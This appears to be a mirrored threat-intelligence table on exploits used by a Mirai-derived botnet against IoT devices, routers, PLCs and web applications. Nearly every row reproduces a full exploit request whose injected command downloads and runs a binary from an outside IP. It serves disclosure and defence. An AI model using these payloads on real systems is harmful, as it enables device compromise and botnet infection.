mirror of
https://github.com/blackorbird/APT_REPORT.git
synced 2025-06-12 02:04:17 +00:00
7.2 KiB
7.2 KiB
For more details please contact * @blackorbrid
Thanks for * pan-unit42
| Vulnerability | Affected Devices | Exploit Format |
|---|---|---|
| CVE-2019-12989, CVE-2019-12991 | Citrix SD-WAN Appliances (tested on 10.2.2) | POST /sdwan/nitro/v1/config/get_package_file?action=file_download/cgi-bin/installpatch.cgi?swc-token=%d&installfile=`%s`' % '99999 cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1'SSL_CLIENT_VERIFY' : 'SUCCESS'get_package_fil:site_name: 'blah' union select 'tenable','zero','day','research' INTO OUTFILE '/tmp/token_0';#,appliance_type: primary,package_type: activeUser-Agent: Hello-WorldConnection: keep-alive |
| EyeLock nano NXT Remote Code Execution | EyeLock NXT Biometric Iris Readers with firmware version 3.5 | GET /scripts/rpc.php?action=updatetime×erver=||cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1 |
| Iris ID IrisAccess ICU Cross-Site Scripting | Iris ID IrisAccess ICU 7000-2 | POST /html/SetSmarcardSettings.php HTTP/1.1Content-Length: 11660Content-Type: application/x-www-form-urlencodedConnection: closeX-Powered-By: PHP/5.5.13User-Agent: joxypoxy/7.2.6HidChannelID=2&HidcmbBook=0&cmbBook=0|cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard+%23&HidDisOffSet=13&txtOffSet=37&HidDataFormat=1&HidDataFormatVal=1&DataFormat=1&HidFileAvailable=0&HidEncryAlg=0&EncryAlg=0&HidFileType=0&HidIsFileSelect=0&HidUseAsProxCard=0&HidVerForPHP=1.00.08 |
| CVE-2015-4051 | Beckhoff CX9020 PLCs | POST /upnpisapi?uuid:+urn:beckhoff.com:serviceId:cxconfig HTTP/1.1User-Agent: Hello-WorldHost: 192.168.0.1:5120Content-type: text/xml; charset=utf-8SOAPAction: urn:beckhoff.com:service:cxconfig:1#WriteM-SEARCH * HTTP/1.1HOST: 239.255.255.250:1900MAN: ssdp:discover',0Dh,0AhMX: 3ST: upnp:rootdevice<?xml version="1.0" encoding="utf-8"?><s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><u:Write xmlns:u="urn:beckhoff.com:service:cxconfig:1"><netId></netId><nPort>0</nPort><indexGroup>0</indexGroup><IndexOffset>wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard</IndexOffset><pData>AQAAAAAA</pData></u:Write></s:Body></s:Envelope> |
| Xfinity Gateway Remote Code Execution | Xfinity Gateways | POST /actionHandler/ajax_network_diagnostic_tools.php HTTP/1.1Host: 10.0.0.1:80User-Agent: Accept: application/json, text/javascript, */*; q=0.01Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: http://10.0.0.1/network_diagnostic_tools.phpContent-Length: 91Cookie: PHPSESSID=; auth=DNT: 1X-Forwarded-For: 8.8.8.8Connection: keep-alivetest_connectivity=true&destination_address=www.comcast.net || cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard; &count1=4 |
| Beward N100 Authenticated Remote Code Execution | Beward N100 IP Cameras | GET /cgi-bin/operator/servetest?cmd=cd /tmp; wget http://185.164.2.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1Authorization: Basic YWRtaW46YWRtaW4=Server: Boa/0.94.14rc21Accept-Ranges: bytesConnection: closeContent-type: text/plain |
| Fritz!Box Webcm Command Injection - this vulnerability was first briefly seen exploited by the Muhstik botnet in January 2018. This is the first instance of exploitation by a Mirai descendant. | Several versions of Fritz!Box devices | GET /cgi-bin/webcm HTTP/1.1var:lang&cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard |
| FLIR Thermal Camera Command Injection | Certain FC-Series S and PT-Series models of FLIR Cameras | POST /page/maintenance/lanSettings/dns HTTP/1.1Host: 192.168.0.1:80Content-Length: 64Accept: */*Origin: http://192.168.0.1X-Requested-With: XMLHttpRequestUser-Agent: Testingus/1.0Content-Type: application/x-www-form-urlencodedReferer: http://192.168.0.1/maintenanceAccept-Language: en-US,en;q=0.8,mk;q=0.6Cookie: PHPSESSID=d1eabfdb8db4b95f92c12b8402abc03bConnection: closedns%5Bserver1%5D=8.8.8.8&dns%5Bserver2%5D=8.8.4.4%60cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard%60 |
| Sapido RB-1732 Remote Command Execution | Sapido RB-1732 Wireless Routers | GET /goform/formSysCmd HTTP/1.1('<textarea rows="15" name="msg" cols="80" wrap="virtual">')('</textarea>'){'sysCmd': cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard, 'apply': 'Apply', 'submit-url':'/syscmd.asp', 'msg':''} |
| CVE-2016-0752 | Ruby on Rails multiple versions | POST /users/%2f/%2fproc%2fself%2fcomm HTTP/1.1Content-Type: multipart/form-data; boundary=<%=`wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard -O /tmp/richard; chmod +x /tmp/richard; /tmp/richard`%> |
| CVE-2014-3914 | Rocket ServerGraph 1.2 (tested on Windows 2008 R2 64 bits, Windows 7 SP1 32 bits and Ubuntu 12.04 64 bits) | POST /SGPAdmin/fileRequest HTTP/1.1&invoker=&title=¶ms=&id=&cmd=cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard&source=&query= |
| CVE-2015-2208 | PHPMoAdmin installations | POST /moadmin/moadmin.php HTTP/1.1Host: 192.168.0.1:80User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0)Gecko/20100101 Firefox/36.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-alivePragma: no-cacheCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedContent-Length: 34object=1;system(wget http://185.164.72.155/richard; curl -O http:#//185.164.72.155/richard; chmod +x richard; ./richard);exit |